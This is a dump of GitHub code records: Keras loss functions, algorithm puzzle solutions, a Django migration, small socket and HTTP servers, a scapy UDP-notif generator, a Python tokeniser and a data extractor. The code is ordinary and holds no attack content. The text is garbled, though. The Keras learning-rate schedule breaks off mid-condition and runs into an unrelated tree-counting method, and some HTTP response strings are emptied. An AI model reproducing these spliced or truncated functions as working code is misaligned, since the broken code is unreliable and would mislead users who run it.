}\n\nmodels = make_modelz(img_shape, model_img_cnvt, model_gkernel, model_out)\nmodels['pre_model'].summary()\n\nTHRESHOLD = 0.5\n\n# credits: https://www.kaggle.com/guglielmocamporese/macro-f1-score-keras\n\nK_epsilon = K.epsilon()\ndef f1(y_true, y_pred):\n #y_pred = K.round(y_pred)\n y_pred = K.cast(K.greater(K.clip(y_pred, 0, 1), THRESHOLD), K.floatx())\n tp = K.sum(K.cast(y_true*y_pred, 'float'), axis=0)\n tn = K.sum(K.cast((1-y_true)*(1-y_pred), 'float'), axis=0)\n fp = K.sum(K.cast((1-y_true)*y_pred, 'float'), axis=0)\n fn = K.sum(K.cast(y_true*(1-y_pred), 'float'), axis=0)\n\n p = tp / (tp + fp + K_epsilon)\n r = tp / (tp + fn + K_epsilon)\n\n f1 = 2*p*r / (p+r+K_epsilon)\n f1 = tf.where(tf.is_nan(f1), tf.zeros_like(f1), f1)\n return K.mean(f1)\n\ndef f1_loss(y_true, y_pred):\n \n #y_pred = 
K.cast(K.greater(K.clip(y_pred, 0, 1), THRESHOLD), K.floatx())\n tp = K.sum(K.cast(y_true*y_pred, 'float'), axis=0)\n tn = K.sum(K.cast((1-y_true)*(1-y_pred), 'float'), axis=0)\n fp = K.sum(K.cast((1-y_true)*y_pred, 'float'), axis=0)\n fn = K.sum(K.cast(y_true*(1-y_pred), 'float'), axis=0)\n\n p = tp / (tp + fp + K_epsilon)\n r = tp / (tp + fn + K_epsilon)\n\n f1 = 2*p*r / (p+r+K_epsilon)\n f1 = tf.where(tf.is_nan(f1), tf.zeros_like(f1), f1)\n return 1-K.mean(f1)\n\ngamma = 2.0\nepsilon = K.epsilon()\ndef focal_loss(y_true, y_pred):\n pt = y_pred * y_true + (1-y_pred) * (1-y_true)\n pt = K.clip(pt, epsilon, 1-epsilon)\n CE = -K.log(pt)\n FL = K.pow(1-pt, gamma) * CE\n loss = K.sum(FL, axis=1)\n return loss\n\n#Train\nmodels['pre_model'].compile(loss=focal_loss,\n optimizer='adam',\n metrics=['categorical_accuracy', 'binary_accuracy', f1])\nmodels['pre_model'].summary()\n\ndef lr_schedule(epoch):\n lr0 = 0.001\n epoch1 = 64\n epoch2 = 64\n epoch3 = 64\n epoch4 = 64\n \n if epoch int:\n if not root:\n return 0\n\n return 1+self.countNodes(root.left)+self.countNodes(root.right)\n\n def countNodesOptimized(self, root: Optional[TreeNode]) -> int:\n if not root:\n return 0\n\n left_level: int = 1\n left_node: TreeNode = root.left\n\n while(left_node):\n left_node = left_node.left\n left_level += 1\n\n right_level = 1\n right_node: TreeNode = root.right\n\n while(right_node):\n right_node = right_node.right\n right_level += 1\n\n if left_level == right_level:\n return (2**left_level)-1\n\n return 1+self.countNodesOptimized(root.left)+self.countNodesOptimized(root.right)\n","repo_name":"anuragchris/Python-Data-Structures","sub_path":"Trees/CountCompleteTreeNodes.py","file_name":"CountCompleteTreeNodes.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41917446044","text":"\"\"\"\nHash Tables: Ransom Note\n\nhttps://www.hackerrank.com/challenges/ctci-ransom-note\n\"\"\"\nimport unittest\nfrom collections import Counter\n\n\ndef ransom_note(magazine, ransom):\n words = Counter(magazine)\n\n for word in ransom:\n if word not in words or words[word] == 0:\n return False\n else:\n words[word] -= 1\n\n return True\n\n\nif __name__ == '__main__':\n m, n = map(int, input().strip().split(' '))\n magazine = input().strip().split(' ')\n ransom = input().strip().split(' ')\n\n answer = ransom_note(magazine, ransom)\n if answer:\n print(\"Yes\")\n else:\n print(\"No\")\n\n\nclass TestRansomNote(unittest.TestCase):\n def test_ransom_note(self):\n self.assertEqual(\n True,\n ransom_note(\"give me one grand today night\", \"give one grand today\")\n )\n\n self.assertEqual(\n False,\n ransom_note(\"give me one grand today night\", \"give one grand hello\")\n )\n\n self.assertEqual(\n False,\n ransom_note(\"give me one grand today night\", \"give one grand grand today\")\n )\n","repo_name":"chanshik/HackerRank","sub_path":"ctci-ransom-note.py","file_name":"ctci-ransom-note.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20475757393","text":"import sys\nimport math\n\ninput = sys.stdin.readline\n\nn = int(input())\n\nlst = []\n\nfor i in range(n):\n lst.append(int(input()))\n \ndef is_prime_number(x):\n for i in range(2,int(math.sqrt(x))+1):\n if x % i == 0:\n return False\n return True\n\nfor i in lst:\n x = i\n if x == 0 or x == 1:\n print(2)\n continue\n else:\n while is_prime_number(x) == False:\n x += 
1\n print(x)\n \n ","repo_name":"minyou2675/Baekjoon_Algorithms","sub_path":"Numbers/4134.py","file_name":"4134.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19645244185","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('base', '0020_auto_20160213_2111'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='team',\n name='will_come',\n field=models.PositiveSmallIntegerField(default=2, verbose_name='will come to site', choices=[(0, 'yes'), (1, 'no'), (2, 'not decided yet')]),\n ),\n ]\n","repo_name":"SharifAIChallenge/AIC_mezzanine_site","sub_path":"base/migrations/0021_team_will_come.py","file_name":"0021_team_will_come.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"43904223623","text":"from socket import *\nimport datetime\n\nserverSocket = socket(AF_INET, SOCK_STREAM)\nserverPort = 6791\nserverSocket.bind(('',serverPort))\nserverSocket.listen(1)\nwhile True:\n\tprint ('Ready to serve...')\n\tconnectionSocket, addr = serverSocket.accept()\n\tprint (\"addr:\\n\", addr)\n\tmessage = connectionSocket.recv(1024)\n\tif not message:\n\t\tbreak\n\tf = open(message)\n\toutputdata = f.read()\n\tprint(\"data :\",outputdata)\n\toutput = bytes(outputdata, 'utf-8')\n\tconnectionSocket.send(output)\n\n\nconnectionSocket.close()","repo_name":"cerengumus/Mobile-Communication-Network","sub_path":"optionalExercisesWebServer/Exercises2/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10896129470","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\n\nclass S(BaseHTTPRequestHandler):\n def _set_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def do_GET(self):\n print(self.path)\n if self.path == \"/take\":\n if open(\"take.txt\", \"r\").read().strip()==\"yes\":\n open(\"take.txt\", \"w\").write(\"no\")\n else:\n open(\"take.txt\", \"w\").write(\"yes\")\n if self.path == \"/good\":\n if open(\"reward.txt\", \"r\").read().strip()!=\"0\":\n open(\"reward.txt\", \"w\").write(\"0\")\n else:\n open(\"reward.txt\", \"w\").write(\"1\")\n if self.path == \"/bad\":\n if open(\"reward.txt\", \"r\").read().strip()!=\"0\":\n open(\"reward.txt\", \"w\").write(\"0\")\n else:\n open(\"reward.txt\", \"w\").write(\"-1\")\n self._set_headers()\n classification = open(\"classification.txt\", \"r\").read()\n # self.wfile.write(bytes(\"
\"+str(classification)+\"
\", \"utf-8\"))\n self.wfile.write(bytes(str(classification), \"utf-8\"))\n\n def do_HEAD(self):\n self._set_headers()\n\n def do_POST(self):\n # Doesn't do anything with posted data\n self._set_headers()\n self.wfile.write(bytes(\"
POST!
\", \"utf-8\"))\n\ndef run(server_class=HTTPServer, handler_class=S, port=80):\n server_address = ('', port)\n httpd = server_class(server_address, handler_class)\n print('Starting httpd...')\n httpd.serve_forever()\n\nrun(port=42069)\n","repo_name":"oxai/vrai","sub_path":"agent/neos/tumblebee/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"75"} +{"seq_id":"21078965606","text":"# page 106\n\nfrom collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n def alienOrder(self, words: List[str]) -> str:\n adjList = defaultdict(list)\n\n for i in range(len(words) - 1):\n word1, word2 = words[i], words[i + 1]\n minL = min(len(word1), len(word2))\n\n # if word1 is longer than word2 and word2 is a prefix of word1, then the order is invalid (weird edge case)\n if len(word1) > len(word2) and word1[:minL] == word2[:minL]:\n return \"\"\n\n # finding the first point of difference between word1 and word2, to establish the relative order\n # of the 2 differing characters\n for j in range(minL):\n if word1[j] != word2[j]:\n adjList[word1[j]].append(word2[j])\n break\n\n # if a char is present in visited => it has been visited. The Bool value indicates if it's in the current path\n visited = {}\n result = [] # to store the (reverse) topological ordering\n\n # topological sort / post order dfs\n\n # this function returns true if the current path has a cycle\n def dfs(char):\n if char in visited:\n # if the char has already been visited in the current path => there's a cycle\n return visited[char]\n\n visited[char] = True\n\n if char in adjList:\n for nei in adjList[char]:\n if dfs(nei):\n return True\n\n visited[char] = False\n result.append(char)\n\n for char in adjList:\n if dfs(char): # if there's a cycle in the current path => invalid ordering\n return \"\"\n\n reversed(result)\n return \"\".join(result)\n","repo_name":"TareshBatra/pyLeetCode","sub_path":"Graphs/alien-dictionary-lc269.py","file_name":"alien-dictionary-lc269.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25968866510","text":"import logging\nimport random\nimport time\nfrom datetime import datetime\n\nfrom scapy.all import send\nfrom scapy.layers.inet import IP, UDP\n\nfrom unyte_generator.models.opt import SEGMENTATION_OPT\nfrom unyte_generator.models.payload import PAYLOAD\nfrom unyte_generator.models.udpn import UDPN\nfrom unyte_generator.models.unyte_global import (UDPN_HEADER_LEN,\n UDPN_SEGMENTATION_OPT_LEN)\nfrom unyte_generator.unyte_generator import UDP_notif_generator\n\n\nclass UDP_notif_generator_draft_11(UDP_notif_generator):\n\n def __init__(self, args):\n super().__init__(args=args)\n\n def __generate_udp_notif_packets(self, yang_push_msgs: list, encoding: str) -> list:\n payload_per_msg_len = self.mtu - UDPN_HEADER_LEN\n\n udp_notif_packets: list = [] # list[list[msg]]\n for payload in yang_push_msgs:\n # check if segmentation is needed\n if (len(payload) + UDPN_HEADER_LEN) > self.mtu:\n payload_per_msg_len = self.mtu - UDPN_HEADER_LEN - UDPN_SEGMENTATION_OPT_LEN\n udp_notif_segmented_pckts = len(payload) // payload_per_msg_len\n if len(payload) % payload_per_msg_len != 0:\n udp_notif_segmented_pckts += 1\n else:\n udp_notif_segmented_pckts = 1\n\n aggregated_msgs: list = []\n for packet_increment in range(udp_notif_segmented_pckts):\n if udp_notif_segmented_pckts == 1:\n 
packet = IP(src=self.source_ip, dst=self.destination_ip)/UDP()/UDPN()/PAYLOAD()\n else:\n packet = IP(src=self.source_ip, dst=self.destination_ip)/UDP()/UDPN()/SEGMENTATION_OPT()/PAYLOAD()\n\n packet.sport = self.source_port\n packet.dport = self.destination_port\n if udp_notif_segmented_pckts == 1:\n packet[UDPN].header_length = UDPN_HEADER_LEN\n packet[PAYLOAD].message = payload\n packet[UDPN].message_length = packet[UDPN].header_length + len(packet[PAYLOAD].message)\n else:\n packet[UDPN].header_length = UDPN_HEADER_LEN + UDPN_SEGMENTATION_OPT_LEN\n packet[SEGMENTATION_OPT].segment_id = packet_increment\n if (len(payload[payload_per_msg_len * packet_increment:]) > payload_per_msg_len):\n packet[PAYLOAD].message = payload[payload_per_msg_len * packet_increment:payload_per_msg_len * (packet_increment + 1)]\n packet[UDPN].message_length = packet[UDPN].header_length + len(packet[PAYLOAD].message)\n else:\n packet[PAYLOAD].message = payload[payload_per_msg_len * packet_increment:]\n packet[UDPN].message_length = packet[UDPN].header_length + len(packet[PAYLOAD].message)\n packet[SEGMENTATION_OPT].last = 1\n if encoding == 'json':\n packet[UDPN].media_type = 1\n elif encoding == 'xml':\n packet[UDPN].media_type = 2\n elif encoding == 'cbor':\n packet[UDPN].media_type = 3\n\n aggregated_msgs.append(packet)\n udp_notif_packets.append(aggregated_msgs)\n return udp_notif_packets\n\n def __forward_current_message(self, udp_notif_msgs: list, current_domain_id: int) -> int:\n current_message_lost_packets = 0\n # if self.random_order: # FIXME: random reorder\n # random.shuffle(udp_notif_msgs)\n\n if current_domain_id not in self.msg_id:\n self.msg_id[current_domain_id] = 0\n\n msg_id = self.msg_id[current_domain_id]\n for packet in udp_notif_msgs:\n packet[UDPN].observation_domain_id = current_domain_id\n packet[UDPN].message_id = msg_id\n if (self.probability_of_loss == 0):\n send(packet, verbose=0)\n elif random.randint(1, int(1000 * (1 / self.probability_of_loss))) >= 1000:\n send(packet, verbose=0)\n else:\n current_message_lost_packets += 1\n if len(udp_notif_msgs) == 1:\n logging.info(\"simulating packet number 0 from message_id \" + str(packet[UDPN].message_id) + \" lost\")\n else:\n logging.info(\"simulating packet number \" + str(packet[SEGMENTATION_OPT].segment_id) +\n \" from message_id \" + str(packet[UDPN].message_id) + \" lost\")\n if len(udp_notif_msgs) == 1:\n self.logger.log_packet(packet)\n else:\n self.logger.log_segment(packet, packet[SEGMENTATION_OPT].segment_id)\n self.save_pcap(packet)\n msg_id += 1\n self.msg_id[current_domain_id] = msg_id\n\n return current_message_lost_packets\n\n def _stream_infinite_udp_notif(self, encoding: str):\n observation_domain_id = self.initial_domain\n\n seq_nb = 0\n time_reference = datetime.now()\n obs_domain_ids = [obs_id for obs_id in range(self.initial_domain, self.initial_domain + self.additional_domains + 1, 1)]\n # Send subscription-started notification first\n subs_started: str = ''\n if encoding == 'json':\n subs_started = self.mock_payload_reader.get_json_subscription_started_notif(msg_timestamp=time_reference, sequence_number=seq_nb, observation_domain_ids=obs_domain_ids)\n elif encoding == 'xml':\n subs_started = self.mock_payload_reader.get_xml_subscription_started_notif(msg_timestamp=time_reference, sequence_number=seq_nb, observation_domain_ids=obs_domain_ids)\n elif encoding == 'cbor':\n subs_started = self.mock_payload_reader.get_cbor_subscription_started_notif(msg_timestamp=time_reference, sequence_number=seq_nb, 
observation_domain_ids=obs_domain_ids)\n\n seq_nb += 1\n\n udp_notif_msgs: list[list] = self.__generate_udp_notif_packets(yang_push_msgs=[subs_started], encoding=encoding)\n for udp_notif_msg in udp_notif_msgs:\n self.__forward_current_message(udp_notif_msg, observation_domain_id)\n\n while True:\n yang_push_payloads: list[str] = []\n if encoding == 'json':\n yang_push_payloads = self.mock_payload_reader.get_json_push_update_1_notif(msg_timestamp=time_reference, sequence_number=seq_nb)\n elif encoding == 'xml':\n yang_push_payloads = self.mock_payload_reader.get_xml_push_update_1_notif(msg_timestamp=time_reference, sequence_number=seq_nb)\n elif encoding == 'cbor':\n yang_push_payloads = self.mock_payload_reader.get_cbor_push_update_1_notif(msg_timestamp=time_reference, sequence_number=seq_nb)\n\n # Generate packet only once\n udp_notif_msgs: list[list] = self.__generate_udp_notif_packets(yang_push_msgs=[yang_push_payloads], encoding=encoding)\n\n for udp_notif_msg in udp_notif_msgs:\n self.__forward_current_message(udp_notif_msg, observation_domain_id)\n\n time.sleep(self.waiting_time)\n observation_domain_id += 1\n\n if observation_domain_id > (self.initial_domain + self.additional_domains):\n observation_domain_id = self.initial_domain\n time_reference = datetime.now()\n seq_nb += 1\n\n def _send_n_udp_notif(self, message_to_send: int, encoding: str):\n payloads: list[str] = []\n\n if encoding == 'xml':\n payloads = self._get_n_xml_payloads(push_update_msgs=message_to_send)\n elif encoding == 'json':\n payloads = self._get_n_json_payloads(push_update_msgs=message_to_send)\n elif encoding == 'cbor':\n payloads = self._get_n_cbor_payloads(push_update_msgs=message_to_send)\n\n lost_packets = 0\n forwarded_packets = 0\n\n # Generate packet only once\n udp_notif_msgs: list[list] = self.__generate_udp_notif_packets(yang_push_msgs=payloads, encoding=encoding)\n\n observation_domain_id = self.initial_domain\n # if self.random_order:\n # random.shuffle(udp_notif_msgs)\n\n for udp_notif_msg_group in udp_notif_msgs:\n current_message_lost_packets: int = self.__forward_current_message(udp_notif_msg_group, observation_domain_id)\n forwarded_packets += len(udp_notif_msg_group) - current_message_lost_packets\n lost_packets += current_message_lost_packets\n\n time.sleep(self.waiting_time)\n observation_domain_id += 1\n\n if observation_domain_id > (self.initial_domain + self.additional_domains):\n observation_domain_id = self.initial_domain\n logging.info('Sent ' + str(forwarded_packets) + ' messages')\n logging.info('Simulated %d lost packets from %d total packets', lost_packets, (forwarded_packets + lost_packets))\n","repo_name":"network-analytics/udp-notif-scapy","sub_path":"src/unyte_generator/unyte_generator_draft_11.py","file_name":"unyte_generator_draft_11.py","file_ext":"py","file_size_in_byte":8945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"26576650499","text":"\"\"\"Contains functionality for tokenising Python source code.\"\"\"\r\n\r\n\r\nimport re\r\n\r\n\r\nVALID_TOKEN_TYPES = (\r\n\t\"identifier\", \"from\", \"import\", \".\", \",\", \"*\", \"other\"\r\n)\r\nVALID_STRING_DELIMITERS = (\r\n\t\"\\'\", \"\\\"\", \"\\'\\'\\'\", \"\\\"\\\"\\\"\"\r\n)\r\nREGEX_TEMPLATE = r'([^\\\\]{}|\\\\\\\\{})'\r\nEND_OF_STRING_REGEXES = {}\r\nfor delimeter in VALID_STRING_DELIMITERS:\r\n\tregexStr = REGEX_TEMPLATE.format(delimeter, delimeter)\r\n\tEND_OF_STRING_REGEXES[delimeter] = re.compile(regexStr)\r\n\r\nclass 
Token:\r\n\r\n\t\"\"\"Represents a single token.\"\"\"\r\n\r\n\tdef __init__(self, tokenType, value = None):\r\n\t\t\"\"\"Construct a new instance of Token.\r\n\r\n\t\tArguments:\r\n\t\ttokenType -- String value dneoting the TYPE of the token.\r\n\t\t\t\t\t If this string is not in VALID_TOKEN_TYPES,\r\n\t\t\t\t\t then a ValueError is raised.\r\n\r\n\t\tKeyword arguments:\r\n\t\tvalue -- Value of the token (exact meaning depends on the\r\n\t\t\t\t token's type). If not provided, then the token's\r\n\t\t\t\t type also becomes its value. (default: None)\r\n\r\n\t\t\"\"\"\r\n\t\tif not tokenType in VALID_TOKEN_TYPES:\r\n\t\t\traise ValueError(\"Invalid token type '{}' given\".format(tokenType))\r\n\r\n\t\tself.type = tokenType\r\n\t\tif value:\r\n\t\t\tself.value = value\r\n\t\telse:\r\n\t\t\tself.value = self.type\r\n\r\n\tdef __eq__(self, other):\r\n\t\t\"\"\"Return True if both instances of token have equivalent types and values.\r\n\r\n\t\tArguments:\r\n\t\tother -- Instance of Token to compare with\r\n\r\n\t\t\"\"\"\r\n\t\treturn (self.type == other.type and self.value == other.value)\r\n\r\n\tdef __ne__(self, other):\r\n\t\t\"\"\"Return True if both instances of token do NOT have equivalent types and values.\r\n\r\n\t\tArguments:\r\n\t\tother -- Instance of Token to compare with\r\n\r\n\t\t\"\"\"\r\n\t\treturn (self.type != other.type or self.value != other.value)\r\n\r\n\tdef __repr__(self):\r\n\t\t\"\"\"Return human-readable represetation of Token instance.\"\"\"\r\n\t\treturn str(self)\r\n\r\n\tdef __str__(self):\r\n\t\t\"\"\"Return string representation of Token instance.\"\"\"\r\n\t\treturn \"({}, {})\".format(self.type, self.value)\r\n\r\n\r\nclass Tokeniser:\r\n\r\n\t\"\"\"Class used to tokenise textual Python source code.\r\n\r\n\tNote that the tokens returned do not represent full Python source\r\n\tcode - it is merely a stripped down set of tokens intended\r\n\tto be used purely for identifying import dependencies.\r\n\r\n\t\"\"\"\r\n\r\n\tIDENTIFIER_REGEX = re.compile( r\"[a-zA-Z_][a-zA-Z0-9_]*\" )\r\n\r\n\tdef __init__(self):\r\n\t\t\"\"\"Construct new instance of Tokeniser.\"\"\"\r\n\t\tself.clear()\r\n\r\n\tdef clear(self):\r\n\t\t\"\"\"Reset tokeniser's state, making it ready to tokenise another source.\"\"\"\r\n\t\tself.tokens = []\r\n\t\tself.source = \"\"\r\n\t\tself.index = 0\r\n\r\n\tdef currentChar(self):\r\n\t\t\"\"\"Return current character from source, or None if index is out of bounds.\"\"\"\r\n\t\tif self.index < len(self.source):\r\n\t\t\treturn self.source[self.index]\r\n\t\telse:\r\n\t\t\treturn None\r\n\r\n\tdef nextChar(self):\r\n\t\t\"\"\"Increment character index and returns the new character.\"\"\"\r\n\t\tself.index += 1\r\n\t\treturn self.currentChar()\r\n\r\n\tdef peekChar(self):\r\n\t\t\"\"\"Return next character but doesn't increment the character index.\"\"\"\r\n\t\tif (self.index + 1) < len(self.source):\r\n\t\t\treturn self.source[self.index + 1]\r\n\t\telse:\r\n\t\t\treturn None\r\n\r\n\tdef tokenise(self, source):\r\n\t\t\"\"\"Return list of Token objects by tokensing Python source code.\r\n\r\n\t\tArguments:\r\n\t\tsource -- Python source code to tokenise\r\n\r\n\t\t\"\"\"\r\n\t\tif not isinstance(source, str):\r\n\t\t\traise TypeError(\"Source to tokenise must be a string\")\r\n\r\n\t\tself.clear()\r\n\t\tself.source = source\r\n\r\n\t\t# Maintain buffer which stores currently scanned token\r\n\t\tbuff = []\r\n\t\tch = self.currentChar() # get first character\r\n\t\t# Go through each character of source string\r\n\t\twhile ch:\r\n\t\t\tif ch 
in (\" \", \"\\n\", \"\\t\", \"\\r\"): # ignore whitespace - breaks current token\r\n\t\t\t\tself.addTokenFromBuffer(buff)\r\n\t\t\telif ch in VALID_STRING_DELIMITERS:\r\n\t\t\t\tself.addTokenFromBuffer(buff)\r\n\t\t\t\t# Perform a look-ahead by three characters to check\r\n\t\t\t\t# exactly which delimiter is being used\r\n\t\t\t\tstart = self.index\r\n\t\t\t\tend = min(start + 3, len(self.source))\r\n\t\t\t\tfull = self.source[start:end]\r\n\t\t\t\t# If the three characters represent a valid delimiter,\r\n\t\t\t\t# use that. If it's not, then just use the single character\r\n\t\t\t\tif full in VALID_STRING_DELIMITERS:\r\n\t\t\t\t\tself.skipString(full)\t\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.skipString(ch)\r\n\t\t\telif ch == \"#\":\r\n\t\t\t\tself.addTokenFromBuffer(buff)\r\n\t\t\t\tself.skipComment()\r\n\t\t\telif ch in (\".\", \",\", \"*\"): # if character is operator we care about\r\n\t\t\t\tself.addTokenFromBuffer(buff)\r\n\t\t\t\tself.addToken(ch, ch)\r\n\t\t\telif ch.isalnum() or ch == \"_\": # if character IS a word character (alphanumeric or \"_\")\r\n\t\t\t\tbuff.append(ch)\r\n\t\t\telse: # if character is not a word character\r\n\t\t\t\tself.addTokenFromBuffer(buff)\r\n\t\t\t\tself.addToken(\"other\", ch)\r\n\r\n\t\t\t# Get the next character\r\n\t\t\tch = self.nextChar()\r\n\r\n\t\t# Dump whatever is remaining in the buffer to a token\r\n\t\tself.addTokenFromBuffer(buff)\r\n\r\n\t\t# Clear the token list for later tokenisations\r\n\t\tfoundTokens = self.tokens\r\n\t\tself.clear()\r\n\t\treturn foundTokens\r\n\r\n\tdef addToken(self, tokenType, value):\r\n\t\t\"\"\"Add token to tokeniser's store.\r\n\r\n\t\tArguments:\r\n\t\ttokenType -- Type the newly added token should have\r\n\t\tvalue -- Value the newly added token should have\r\n\r\n\t\t\"\"\"\r\n\t\tself.tokens.append( Token(tokenType, value) )\r\n\r\n\tdef addTokenFromBuffer(self, buff):\r\n\t\t\"\"\"Look into contents of buffer and use it to construct a new token.\r\n\r\n\t\tIf buffer is empty, nothing is done. Calling this clears the\r\n\t\tbuffer afterwards.\r\n\r\n\t\tArguments:\r\n\t\tbuff -- List containing all the characters currently in the\r\n\t\t\t\ttoken buffer\r\n\r\n\t\t\"\"\"\r\n\t\t# If buffer is empty, we don't bother adding it as a token\r\n\t\tif len(buff) == 0:\r\n\t\t\treturn\r\n\r\n\t\t# Get contents of buffer as a string\r\n\t\tbufferStr = \"\".join(buff)\r\n\t\t# Check if buffer is a keyword we care about\r\n\t\tif bufferStr == \"from\":\r\n\t\t\tself.tokens.append( Token(\"from\") )\r\n\t\telif bufferStr == \"import\":\r\n\t\t\tself.tokens.append( Token(\"import\") )\r\n\t\telse:\r\n\t\t\t# Check if buffer is a valid identifier.\r\n\t\t\tif self.IDENTIFIER_REGEX.search(bufferStr):\r\n\t\t\t\ttokenType = \"identifier\"\r\n\t\t\telse:\r\n\t\t\t\ttokenType = \"other\"\r\n\t\t\t# Add token with the found type and make sure to clear the buffer\r\n\t\t\tself.tokens.append( Token(tokenType, bufferStr) )\r\n\t\t# Clear buffer\r\n\t\tdel buff[:]\r\n\r\n\tdef skipComment(self):\r\n\t\t\"\"\"Skip characters until end of comment (newline) is found.\r\n\r\n\t\tAssumes current character is a \"#\". Ends on newline chararacter\r\n\t\tor end of source.\r\n\r\n\t\t\"\"\"\r\n\t\tch = self.nextChar()\r\n\t\twhile ch and ch != \"\\n\":\r\n\t\t\tch = self.nextChar()\r\n\r\n\tdef skipString(self, startingChar):\r\n\t\t\"\"\"Skip characters until end of string literal is found.\r\n\r\n\t\tAssumes current character is the LAST character of the\r\n\t\tstarting string literal. 
Ends on the LAST character\r\n\t\tof the closing string delimiter or end of source.\r\n\r\n\t\tArguments:\r\n\t\tstartingChar -- The quote character(s) that started\r\n\t\t\t\t\t\tthe literal. Used to determine when\r\n\t\t\t\t\t\tthe literal ends. ValueError is\r\n\t\t\t\t\t\traised if this is not a valid string\r\n\t\t\t\t\t\tdelimiter.\r\n\r\n\t\t\"\"\"\r\n\t\tif not startingChar in VALID_STRING_DELIMITERS:\r\n\t\t\traise ValueError(\"{} is not a valid string delimiter\".format(startingChar))\r\n\r\n\t\t# If the immediate next character ends the string (empty string), just move to the\r\n\t\t# next character\r\n\t\tif (self.peekChar() == startingChar):\r\n\t\t\tself.nextChar()\r\n\t\telse:\r\n\t\t\t# Find first occurrence of required string delimeter\r\n\t\t\t# from the remaining string, wheere it DOES NOT precede\r\n\t\t\t# with an escape character (\\)\r\n\t\t\tremainingString = self.source[(self.index + 1):]\r\n\t\t\tmatch = END_OF_STRING_REGEXES[startingChar].search(remainingString)\r\n\t\t\tif match:\r\n\t\t\t\tself.index += match.end()\r\n\t\t\t# If an occurrence was not found, we've reached the end of the string\t\r\n\t\t\telse:\r\n\t\t\t\tself.index = len(self.source)","repo_name":"DonaldWhyte/module-dependency","sub_path":"moduledependency/tokeniser.py","file_name":"tokeniser.py","file_ext":"py","file_size_in_byte":7621,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"22244166087","text":"import os\nimport show_lists\n\nclass Update():\n def __init__(self, list_identifier, new_list_name):\n self.list_identifier = list_identifier\n self.new_list_name = new_list_name\n\n def update(self):\n lists = show_lists.ShowLists.show_lists()\n checker_for_existence_of_identifier = False\n list_identifier_with_brackets = \"[\" + str(self.list_identifier) + \"]\"\n for i in lists:\n if list_identifier_with_brackets in i:\n checker_for_existence_of_identifier = True\n list_name = i\n break\n if not checker_for_existence_of_identifier:\n return (\"List with unique identifier <\" + list_identifier + \"> not found\")\n list_name_with_ext = list_name + \".txt\"\n new_list_name_with_ext = \"[\" + str(self.list_identifier) + \"] \" + self.new_list_name + \".txt\"\n os.rename(list_name_with_ext, new_list_name_with_ext)\n if (list_name[4:] == self.new_list_name):\n return (\"The name remained the same: <\" + list_name[4:] + \">\")\n else:\n return (\"Updated <\" + list_name[4:] + \"> to <\" + self.new_list_name + \">.\")\n\n# def main():\n# test_object = Update(1, \"Hack\")\n# print (test_object.update())\n\n# if __name__ == '__main__':\n# main()\n","repo_name":"irin4eto/The-great-list","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41600268143","text":"import json\nfrom typing import Dict, Any, List, Union\nfrom easy_spider_tool import is_format_json, jsonpath\nfrom lxml import etree\n\nfrom easy_spider_tool_document.xpath import xpath\n\n__all__ = ['data_extractor', 'is_format_element']\n\n\ndef is_format_element(element_string: Union[str, etree._Element]) -> bool:\n # noinspection PyBroadException\n if isinstance(element_string, etree._Element):\n return True\n try:\n etree.HTML(element_string)\n return True\n except Exception as _:\n pass\n return False\n\n\ndef to_dict(src: Union[str, Dict[str, Any]]) -> Dict[str, Any]:\n if isinstance(src, dict):\n return src\n\n return 
json.loads(src)\n\n\ndef to_element(element: Union[str, etree._Element]) -> etree._Element:\n if isinstance(element, etree._Element):\n return element\n\n if isinstance(element, str):\n return etree.HTML(element)\n\n return etree.HTML('')\n\n\ndef element_type(string: str) -> str:\n \"\"\"获取类型\"\"\"\n if any([\n isinstance(string, dict),\n is_format_json(string),\n ]):\n return 'json'\n elif is_format_element(string):\n return 'element'\n return None\n\n\ndef data_extractor(src_data, expr: Union[str, List[str]], first: bool = False, default=None):\n \"\"\"json,xpath选择器\"\"\"\n # assert src_data, ''\n if not src_data:\n return default\n\n ele_type = element_type(src_data)\n\n if ele_type is None:\n return default\n\n values = None\n\n if isinstance(expr, str):\n expr = [expr]\n\n json_expr = list(filter(lambda x: x.startswith('$'), expr))\n xpath_expr = list(filter(lambda x: x.startswith('.') or x.startswith('/'), expr))\n\n if ele_type == 'json':\n if json_expr:\n data = to_dict(src_data)\n values = jsonpath(data, json_expr, first=first, default=default)\n\n if ele_type == 'element':\n if any(xpath_expr):\n data = to_element(src_data)\n values = xpath(data, xpath_expr, first=first, default=default)\n\n if len(values) < 1:\n values = default\n\n return values\n","repo_name":"hanxinkong/easy-spider-tool-document","sub_path":"easy_spider_tool_document/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} 